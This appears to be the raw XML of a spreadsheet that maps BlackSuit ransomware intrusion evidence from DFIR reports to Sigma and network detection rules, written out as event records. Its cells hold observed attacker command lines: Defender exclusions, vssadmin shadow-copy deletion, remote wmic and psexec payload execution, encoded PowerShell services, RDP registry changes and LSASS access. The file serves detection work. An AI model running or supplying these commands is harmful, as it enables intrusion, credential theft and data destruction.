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osi_ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B7E699A4-3574-F34F-892F-1D7AFADDEAA1}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="549" uniqueCount="279">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>{ "data": "2025-03", "url": "hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/", "tags": ["BlackSuit"]}</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>c:\Users\Admin\AppData\Local\Temp\is-7NKSV.tmp\Zoom_v_2.00.4.tmp</t>
  </si>
  <si>
    <t>powershell -inputformat non -outputformat none -noninteractive -ExecutionPolicy Bypoass -Command Add-Mpreference -ExclusionPath 'C:\'</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>idp.dll</t>
  </si>
  <si>
    <t>inno setup</t>
  </si>
  <si>
    <t>{"object": "http_request", "ul": "IPADDRESS/manual/152/152/zip", "http_method": "GET", "user_agent": "InnoDownLoadPlugin/1.5"}</t>
  </si>
  <si>
    <t>{"object": "proces_create", "process_command_line": r''' "C:\Windows\system32\cmd.exe" cmd /c 4554.cmd '''}</t>
  </si>
  <si>
    <t>{"object": "proces_create", "intiating_process_command_line": r''' "C:\Windows\system32\cmd.exe" cmd /c 4554.cmd ''', "process_command_line": ''' attrib +s +h /D "C:\Program Files\Windows NT\*.*"}</t>
  </si>
  <si>
    <t>{"object": "proces_create", "intiating_process_command_line": r''' "C:\Windows\system32\cmd.exe" cmd /c 4554.cmd ''', "process_command_line": ''' cmd /c tar xf 855.zip"}</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>{"object": "netcon_dns", "file_path": "c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe", "query": "pastebin.com"}</t>
  </si>
  <si>
    <t>.cmd file extracting .zip</t>
  </si>
  <si>
    <t xml:space="preserve">{"object": "process_create", "process_command_line": r''' regsvr32 c:\programdata\2905.dll ''', </t>
  </si>
  <si>
    <t>SecTopRAT.exe &gt; cmd.exe &gt; msbuild.exe</t>
  </si>
  <si>
    <t>spawn</t>
  </si>
  <si>
    <t>attrib  +s +h /D "C:\Program Files\Windows NT\*.*"</t>
  </si>
  <si>
    <t>{"object": "process_access", "target_file_path": "c:\Windows\system32\dllhost.exe", "source_file_path": "c:\windows\temp\run32.exe", "access": "0x1fffff"}</t>
  </si>
  <si>
    <t>{"object": "netcon", "file_path": "c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe", "protocol": "tcp", "destination_ip": "ipaddress"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\cmd.exe /c echo 89fef6b4bcf &gt; \\.\pipe\8caf5e  ''', "initiating_process_command_line": r''' c:\windows\system32\dllhost.exe '''}</t>
  </si>
  <si>
    <t>{"object": "process_access", "target_file_path": "c:\Windows\system32\lsass.exe", "source_file_path": "c:\windows\system32\dllhost.exe", "access": "0x1fffff"}</t>
  </si>
  <si>
    <t>rubeus</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>{"object": "winevt_4624", "logon_type": "9", "logon_process", "seclogo"}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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>nltest-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>whoami-pid</t>
  </si>
  <si>
    <t xml:space="preserve">net group "domain admins" /domain </t>
  </si>
  <si>
    <t>net group "domain admins" /domain</t>
  </si>
  <si>
    <t>nltest /dclist:&lt;DOMAINNAME&gt;.local</t>
  </si>
  <si>
    <t>WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t xml:space="preserve">net user &lt;PRIV_USER&gt; /domain </t>
  </si>
  <si>
    <t>ping &lt;workstation1&gt;</t>
  </si>
  <si>
    <t>ping &lt;workstation2&gt;</t>
  </si>
  <si>
    <t>net view //&lt;IP1&gt;/</t>
  </si>
  <si>
    <t>net view \\&lt;IP1&gt;\</t>
  </si>
  <si>
    <t>net view \\&lt;IP2&gt;\</t>
  </si>
  <si>
    <t>nltest /dclist:&lt;DOMAIN&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">ping &lt;DOMAIN&gt; </t>
  </si>
  <si>
    <t>nltest /FINDUSER:REDACTED</t>
  </si>
  <si>
    <t>$ target-query &lt;REDACTED&gt; -f edge.downloads | rdump -f '{browser} downloaded {path} from {url} {size} via {tab_referrer_url}'
edge downloaded C:\Users\&lt;REDACTED&gt;\Downloads\winrar-x64-701.exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-701.exe 3.77 MB via https://www.bing.com/
edge downloaded C:\Users\&lt;REDACTED&gt;\Downloads\winrar-x64-701 (1).exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/winrar-x64-701.exe 3.77 MB via https://www.bing.com/</t>
  </si>
  <si>
    <t>"C:\Program Files\WinRAR\WinRAR.exe" a -ep1  -scul -r0 -iext   -imon1 -- . G:\REDACTED</t>
  </si>
  <si>
    <t xml:space="preserve">%WINDIR%\system32\cmd.exe /C wmic /node:"REDACTED" process call create "%WINDIR%\Temp\svhost.exe "143.244.146[.]183"" </t>
  </si>
  <si>
    <t>wmic</t>
  </si>
  <si>
    <t>psexec.exe @c:\share$\comps1.txt -u &lt;uname&gt; -p &lt;pwd&gt; cmd /c copy "\&lt;device&gt;\share$123.exe" "c:\windows\temp"</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>cmd.exe /c vssadmin delete shadows /all /quiet</t>
  </si>
  <si>
    <t>vss</t>
  </si>
  <si>
    <t>wmic used to execute malware on domain controller</t>
  </si>
  <si>
    <t>2aa0a6b4-a865-495b-ab51-c28249537b75 - Startup Folder File Write</t>
  </si>
  <si>
    <t>36e037c4-c228-4866-b6a3-48eb292b9955 - DNS Query Request By Regsvr32.EXE</t>
  </si>
  <si>
    <t>526be59f-a573-4eea-b5f7-f0973207634d - New Process Created Via Wmic.EXE</t>
  </si>
  <si>
    <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248 - Potential Recon Activity Via Nltest.EXE</t>
  </si>
  <si>
    <t>e568650b-5dcd-4658-8f34-ded0b1e13992 - Potential Product Class Reconnaissance Via Wmic.EXE</t>
  </si>
  <si>
    <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 - Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
  </si>
  <si>
    <t>0ef56343-059e-4cb6-adc1-4c3c967c5e46 - Suspicious Execution of Systeminfo</t>
  </si>
  <si>
    <t>62510e69-616b-4078-b371-847da438cc03 - Share And Session Enumeration Using Net.EXE</t>
  </si>
  <si>
    <t>d7a95147-145f-4678-b85d-d1ff4a3bb3f6 - CobaltStrike Service Installations - Security</t>
  </si>
  <si>
    <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f - Group Membership Reconnaissance Via Whoami.EXE</t>
  </si>
  <si>
    <t>fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - PsExec Tool Execution</t>
  </si>
  <si>
    <t>c947b146-0abc-4c87-9c64-b17e9d7274a2 - Shadow Copies Deletion Using Operating Systems Utilities</t>
  </si>
  <si>
    <t>15619216-e993-4721-b590-4c520615a67d - Potential Meterpreter/CobaltStrike Activity</t>
  </si>
  <si>
    <t>e6be809d-adfd-473b-b1f5-4a3cc5938df1 - Suspicious RAR Archive Download From temp.sh  
b8a5dde0-fb1c-466e-832e-5a9b33e59b69 - Suspicious Temp File Lookup for Steam User Profile  
78e4aeff-80ce-4b86-9664-2f0313e960e3 - Potential DLL Side Loading Abuse of IKARUS Security GuardX  
476d0227-967d-4429-bc02-abe0985275e2 - Potential SectopRAT MSBuild Network communication  
c475246c-133b-454e-9b9f-963139b4af1a - Adding Hidden Attribute Flag via Command line to Directory  
c79b4806-b86f-4c6e-a7b8-ecdb4b73fb70 - Detect AV/EDR Solutions Enumeration via WMIC  
6df37102-c993-4133-ad3d-b12ca32e03c6 - Detect Process Creation via WMIC with Remote Node</t>
  </si>
  <si>
    <t>sigma_dfir</t>
  </si>
  <si>
    <t>sigma</t>
  </si>
  <si>
    <t>ETPRO ADWARE_PUP InnoDownloadPlugin User-Agent Observed
ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init 
ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)
ET INFO Observed ZeroSSL SSL/TLS Certificate
ET POLICY Tunneled RDP msts Handshake
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY PsExec service created</t>
  </si>
  <si>
    <t>etpro</t>
  </si>
  <si>
    <t>blacksuit-eid0001</t>
  </si>
  <si>
    <t>blacksuit-eid0002</t>
  </si>
  <si>
    <t>blacksuit-eid0003</t>
  </si>
  <si>
    <t>blacksuit-eid0004</t>
  </si>
  <si>
    <t>blacksuit-eid0005</t>
  </si>
  <si>
    <t>blacksuit-eid0006</t>
  </si>
  <si>
    <t>blacksuit-eid0007</t>
  </si>
  <si>
    <t>blacksuit-eid0008</t>
  </si>
  <si>
    <t>blacksuit-eid0009</t>
  </si>
  <si>
    <t>blacksuit-eid0010</t>
  </si>
  <si>
    <t>blacksuit-eid0011</t>
  </si>
  <si>
    <t>blacksuit-eid0012</t>
  </si>
  <si>
    <t>blacksuit-eid0013</t>
  </si>
  <si>
    <t>blacksuit-eid0014</t>
  </si>
  <si>
    <t>blacksuit-eid0015</t>
  </si>
  <si>
    <t>blacksuit-eid0016</t>
  </si>
  <si>
    <t>blacksuit-eid0017</t>
  </si>
  <si>
    <t>blacksuit-eid0018</t>
  </si>
  <si>
    <t>blacksuit-eid0019</t>
  </si>
  <si>
    <t>blacksuit-eid0020</t>
  </si>
  <si>
    <t>blacksuit-eid0021</t>
  </si>
  <si>
    <t>blacksuit-eid0022</t>
  </si>
  <si>
    <t>blacksuit-eid0023</t>
  </si>
  <si>
    <t>blacksuit-eid0024</t>
  </si>
  <si>
    <t>blacksuit-eid0025</t>
  </si>
  <si>
    <t>blacksuit-eid0026</t>
  </si>
  <si>
    <t>blacksuit-eid0027</t>
  </si>
  <si>
    <t>blacksuit-eid0028</t>
  </si>
  <si>
    <t>blacksuit-eid0029</t>
  </si>
  <si>
    <t>blacksuit-eid0030</t>
  </si>
  <si>
    <t>blacksuit-eid0031</t>
  </si>
  <si>
    <t>blacksuit-eid0032</t>
  </si>
  <si>
    <t>blacksuit-eid0033</t>
  </si>
  <si>
    <t>blacksuit-eid0034</t>
  </si>
  <si>
    <t>blacksuit-eid0035</t>
  </si>
  <si>
    <t>blacksuit-eid0036</t>
  </si>
  <si>
    <t>blacksuit-eid0037</t>
  </si>
  <si>
    <t>blacksuit-eid0038</t>
  </si>
  <si>
    <t>blacksuit-eid0039</t>
  </si>
  <si>
    <t>blacksuit-eid0040</t>
  </si>
  <si>
    <t>blacksuit-eid0041</t>
  </si>
  <si>
    <t>blacksuit-eid0042</t>
  </si>
  <si>
    <t>blacksuit-eid0043</t>
  </si>
  <si>
    <t>blacksuit-eid0044</t>
  </si>
  <si>
    <t>blacksuit-eid0045</t>
  </si>
  <si>
    <t>blacksuit-eid0046</t>
  </si>
  <si>
    <t>blacksuit-eid0047</t>
  </si>
  <si>
    <t>blacksuit-eid0048</t>
  </si>
  <si>
    <t>blacksuit-eid0049</t>
  </si>
  <si>
    <t>blacksuit-eid0050</t>
  </si>
  <si>
    <t>blacksuit-eid0051</t>
  </si>
  <si>
    <t>blacksuit-eid0052</t>
  </si>
  <si>
    <t>blacksuit-eid0053</t>
  </si>
  <si>
    <t>blacksuit-eid0054</t>
  </si>
  <si>
    <t>blacksuit-eid0055</t>
  </si>
  <si>
    <t>blacksuit-eid0056</t>
  </si>
  <si>
    <t>blacksuit-eid0057</t>
  </si>
  <si>
    <t>blacksuit-eid0058</t>
  </si>
  <si>
    <t>blacksuit-eid0059</t>
  </si>
  <si>
    <t>blacksuit-eid0060</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid</t>
  </si>
  <si>
    <t>{ "data": "2024-08", "url": "https://thedfirreport.com/2024/08/26/blacksuit-ransomware/", "tags": ["BlackSuit"]}</t>
  </si>
  <si>
    <t>{"object": "winevtx_7045", "service_name": "1221c5c", "service_file_name": "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand &lt;encode&gt;"}</t>
  </si>
  <si>
    <t>{"object": "winevtx_7045", "service_name": "1eaecc0", "service_file_name": "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand &lt;encode&gt;"}</t>
  </si>
  <si>
    <t>{"object": "winevtx_7045", "service_name": "161185c1", "service_file_name": "ADMIN$\61185c1.exe"}</t>
  </si>
  <si>
    <t>psexec_psh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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"object": "process_create", "process_create": "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f", "intiating_process_command_line": "powershell -nop exec bypass -EncodedCommand &lt;encode&gt;"}</t>
  </si>
  <si>
    <t>{"object": "winevtx_4768", "service_name": "krbtgt", "pre_auth_type": "0", "ticket_type": "0x17"}</t>
  </si>
  <si>
    <t>{"object": "process_access", "target_file_path": "c:\Windows\system32\nstsc.exe", "source_file_path": "c:\windows\system32\lsass.exe", "access": "0x1010"}</t>
  </si>
  <si>
    <t>cmd.exe /c systeminfo</t>
  </si>
  <si>
    <t>cmd.exe /c nltest /dclist</t>
  </si>
  <si>
    <t>bloodhound</t>
  </si>
  <si>
    <t>sharphound</t>
  </si>
  <si>
    <t>(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))", "(BuildString("(primarygroupid=*)</t>
  </si>
  <si>
    <t>sharphound ldap search</t>
  </si>
  <si>
    <t>{"object": "winevtx_5145", "share_name": "\\*\IPC$", "target_name": "srvsvc"}</t>
  </si>
  <si>
    <t>{"object": "winevtx_5145", "share_name": "\\*\IPC$", "target_name": "samr"}</t>
  </si>
  <si>
    <t>{"object": "ldap_search", "search_filter": "(|samaccounttype=805306369)(samaccounttype=805306369(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))(objectcategory=organizationalUnit)(objectclass=container)"</t>
  </si>
  <si>
    <t>adfind</t>
  </si>
  <si>
    <t>adfind-pid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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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file_name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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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>powershell connected to port 80 in netcon</t>
  </si>
  <si>
    <t>rundll32.exe netcon to port 443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</si>
  <si>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</si>
  <si>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</si>
  <si>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>{"object": "winevtx_5145", "share_name": "\\*\C$", "target_name": "tools\socks32.exe"}</t>
  </si>
  <si>
    <t>03be05e6-4977-44cd-8ee4-a79400a5ceb0 : Detection of Cobalt Strike Execution
ded07dbe-bcd4-4d15-a27b-1669445d3215 : Enabling RDP service via reg.exe command execution
feee5785-1381-4119-95d0-ca0c3fffe2f2 : Potential Kerberoasting Attack Detected
f8fd3970-d558-40c8-86e2-a989cd53daea : RDP Session from Host with Default Hostname
194e0132-ddee-433c-ac98-3e544c5a2a3a : Suspicious Powershell Execution in Run Key</t>
  </si>
  <si>
    <t>903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution</t>
  </si>
  <si>
    <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE</t>
  </si>
  <si>
    <t>9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution</t>
  </si>
  <si>
    <t>d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe</t>
  </si>
  <si>
    <t>496a0e47-0a33-4dca-b009-9e6ca3591f39 : Suspicious Kerberos RC4 Ticket Encryption</t>
  </si>
  <si>
    <t>8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2</t>
  </si>
  <si>
    <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962 : HackTool - Bloodhound/Sharphound Execution</t>
  </si>
  <si>
    <t>02773bed-83bf-469f-b7ff-e676e7d78bab : BloodHound Collection Files</t>
  </si>
  <si>
    <t>0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 : Mimikatz Detection LSASS Access</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>a18dd26b-6450-46de-8c91-9659150cf088 : Potentially Suspicious GrantedAccess Flags On LSASS</t>
  </si>
  <si>
    <t>098d7118-55bc-4912-a836-dc6483a8d150 : Access To ADMIN$ Network Share</t>
  </si>
  <si>
    <t>61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations - Registry</t>
  </si>
  <si>
    <t>1d61f71d-59d2-479e-9562-4ff5f4ead16b : Suspicious Service Installation</t>
  </si>
  <si>
    <t>4aafb0fa-bff5-4b9d-b99e-8093e659c65f : Writing Local Admin Share</t>
  </si>
  <si>
    <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea : Suspicious Encoded PowerShell Command Line</t>
  </si>
  <si>
    <t>0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo</t>
  </si>
  <si>
    <t>bbb7e38c-0b41-4a11-b306-d2a457b7ac2b : Suspicious File Created In PerfLogs</t>
  </si>
  <si>
    <t>3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder</t>
  </si>
  <si>
    <t>0d5675be-bc88-4172-86d3-1e96a4476536 : Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
  </si>
  <si>
    <t>blacksuit-eid0061</t>
  </si>
  <si>
    <t>blacksuit-eid0062</t>
  </si>
  <si>
    <t>blacksuit-eid0063</t>
  </si>
  <si>
    <t>blacksuit-eid0064</t>
  </si>
  <si>
    <t>blacksuit-eid0065</t>
  </si>
  <si>
    <t>blacksuit-eid0066</t>
  </si>
  <si>
    <t>blacksuit-eid0067</t>
  </si>
  <si>
    <t>blacksuit-eid0068</t>
  </si>
  <si>
    <t>blacksuit-eid0069</t>
  </si>
  <si>
    <t>blacksuit-eid0070</t>
  </si>
  <si>
    <t>blacksuit-eid0071</t>
  </si>
  <si>
    <t>blacksuit-eid0072</t>
  </si>
  <si>
    <t>blacksuit-eid0073</t>
  </si>
  <si>
    <t>blacksuit-eid0074</t>
  </si>
  <si>
    <t>blacksuit-eid0075</t>
  </si>
  <si>
    <t>blacksuit-eid0076</t>
  </si>
  <si>
    <t>blacksuit-eid0077</t>
  </si>
  <si>
    <t>blacksuit-eid0078</t>
  </si>
  <si>
    <t>blacksuit-eid0079</t>
  </si>
  <si>
    <t>blacksuit-eid0080</t>
  </si>
  <si>
    <t>blacksuit-eid0081</t>
  </si>
  <si>
    <t>blacksuit-eid0082</t>
  </si>
  <si>
    <t>blacksuit-eid0083</t>
  </si>
  <si>
    <t>blacksuit-eid0084</t>
  </si>
  <si>
    <t>blacksuit-eid0085</t>
  </si>
  <si>
    <t>blacksuit-eid0086</t>
  </si>
  <si>
    <t>blacksuit-eid0087</t>
  </si>
  <si>
    <t>blacksuit-eid0088</t>
  </si>
  <si>
    <t>blacksuit-eid0089</t>
  </si>
  <si>
    <t>blacksuit-eid0090</t>
  </si>
  <si>
    <t>blacksuit-eid0091</t>
  </si>
  <si>
    <t>blacksuit-eid0092</t>
  </si>
  <si>
    <t>blacksuit-eid0093</t>
  </si>
  <si>
    <t>blacksuit-eid0094</t>
  </si>
  <si>
    <t>blacksuit-eid0095</t>
  </si>
  <si>
    <t>blacksuit-eid0096</t>
  </si>
  <si>
    <t>blacksuit-eid0097</t>
  </si>
  <si>
    <t>blacksuit-eid0098</t>
  </si>
  <si>
    <t>blacksuit-eid0099</t>
  </si>
  <si>
    <t>blacksuit-eid0100</t>
  </si>
  <si>
    <t>blacksuit-eid0101</t>
  </si>
  <si>
    <t>blacksuit-eid0102</t>
  </si>
  <si>
    <t>blacksuit-eid0103</t>
  </si>
  <si>
    <t>blacksuit-eid0104</t>
  </si>
  <si>
    <t>blacksuit-eid0105</t>
  </si>
  <si>
    <t>blacksuit-eid0106</t>
  </si>
  <si>
    <t>blacksuit-eid0107</t>
  </si>
  <si>
    <t>blacksuit-eid0108</t>
  </si>
  <si>
    <t>blacksuit-eid0109</t>
  </si>
  <si>
    <t>blacksuit-eid0110</t>
  </si>
  <si>
    <t>blacksuit-eid0111</t>
  </si>
  <si>
    <t>blacksuit-eid0112</t>
  </si>
  <si>
    <t>blacksuit-eid0113</t>
  </si>
  <si>
    <t>blacksuit-eid0114</t>
  </si>
  <si>
    <t>blacksuit-eid0115</t>
  </si>
  <si>
    <t>blacksuit-eid0116</t>
  </si>
  <si>
    <t>blacksuit-eid0117</t>
  </si>
  <si>
    <t>blacksuit-eid0118</t>
  </si>
  <si>
    <t>blacksuit-eid0119</t>
  </si>
  <si>
    <t>blacksuit-eid0120</t>
  </si>
  <si>
    <t>blacksuit-eid0121</t>
  </si>
  <si>
    <t>blacksuit-eid0122</t>
  </si>
  <si>
    <t>blacksuit-eid0123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</si>
</sst>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0.65138333333" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="123" xr:uid="{FE5245BE-B1B1-F346-9DEE-EEA7DC4A5F10}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsBlank="1" count="3"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blacksuit-eid0001"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\Users\Admin\AppData\Local\Temp\is-7NKSV.tmp\Zoom_v_2.00.4.tmp"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0002"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="powershell -inputformat non -outputformat none -noninteractive -ExecutionPolicy Bypoass -Command Add-Mpreference -ExclusionPath 'C:\'"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0003"/>
    <m/>
    <m/>
    <s v="idp.dll"/>
    <s v="inno setup"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0004"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;http_request&quot;, &quot;ul&quot;: &quot;IPADDRESS/manual/152/152/zip&quot;, &quot;http_method&quot;: &quot;GET&quot;, &quot;user_agent&quot;: &quot;InnoDownLoadPlugin/1.5&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0005"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;proces_create&quot;, &quot;process_command_line&quot;: r''' &quot;C:\Windows\system32\cmd.exe&quot; cmd /c 4554.cmd '''}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0006"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;proces_create&quot;, &quot;intiating_process_command_line&quot;: r''' &quot;C:\Windows\system32\cmd.exe&quot; cmd /c 4554.cmd ''', &quot;process_command_line&quot;: ''' attrib +s +h /D &quot;C:\Program Files\Windows NT\*.*&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0007"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;proces_create&quot;, &quot;intiating_process_command_line&quot;: r''' &quot;C:\Windows\system32\cmd.exe&quot; cmd /c 4554.cmd ''', &quot;process_command_line&quot;: ''' cmd /c tar xf 855.zip&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0008"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;netcon_dns&quot;, &quot;file_path&quot;: &quot;c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe&quot;, &quot;query&quot;: &quot;pastebin.com&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0009"/>
    <m/>
    <s v="generic"/>
    <s v=".cmd file extracting .zip"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0010"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' regsvr32 c:\programdata\2905.dll ''', "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0011"/>
    <m/>
    <s v="spawn"/>
    <s v="SecTopRAT.exe &gt; cmd.exe &gt; msbuild.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0012"/>
    <m/>
    <s v="cmdline"/>
    <s v="attrib  +s +h /D &quot;C:\Program Files\Windows NT\*.*&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0013"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;target_file_path&quot;: &quot;c:\Windows\system32\dllhost.exe&quot;, &quot;source_file_path&quot;: &quot;c:\windows\temp\run32.exe&quot;, &quot;access&quot;: &quot;0x1fffff&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0014"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;netcon&quot;, &quot;file_path&quot;: &quot;c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe&quot;, &quot;protocol&quot;: &quot;tcp&quot;, &quot;destination_ip&quot;: &quot;ipaddress&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0015"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' c:\windows\system32\cmd.exe /c echo 89fef6b4bcf &gt; \\.\pipe\8caf5e  ''', &quot;initiating_process_command_line&quot;: r''' c:\windows\system32\dllhost.exe '''}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0016"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;target_file_path&quot;: &quot;c:\Windows\system32\lsass.exe&quot;, &quot;source_file_path&quot;: &quot;c:\windows\system32\dllhost.exe&quot;, &quot;access&quot;: &quot;0x1fffff&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0017"/>
    <m/>
    <s v="htool"/>
    <s v="rubeus"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0018"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevt_4624&quot;, &quot;logon_type&quot;: &quot;9&quot;, &quot;logon_process&quot;, &quot;seclogo&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0019"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0020"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;&quot;domain admins&quot;&quot; /domain "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0021"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;&quot;Domain Computers&quot;&quot; /domain "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0022"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0023"/>
    <m/>
    <s v="cmdline"/>
    <s v="systeminfo "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0024"/>
    <s v="whoami-pid"/>
    <s v="cmdline"/>
    <s v="whoami /groups"/>
    <m/>
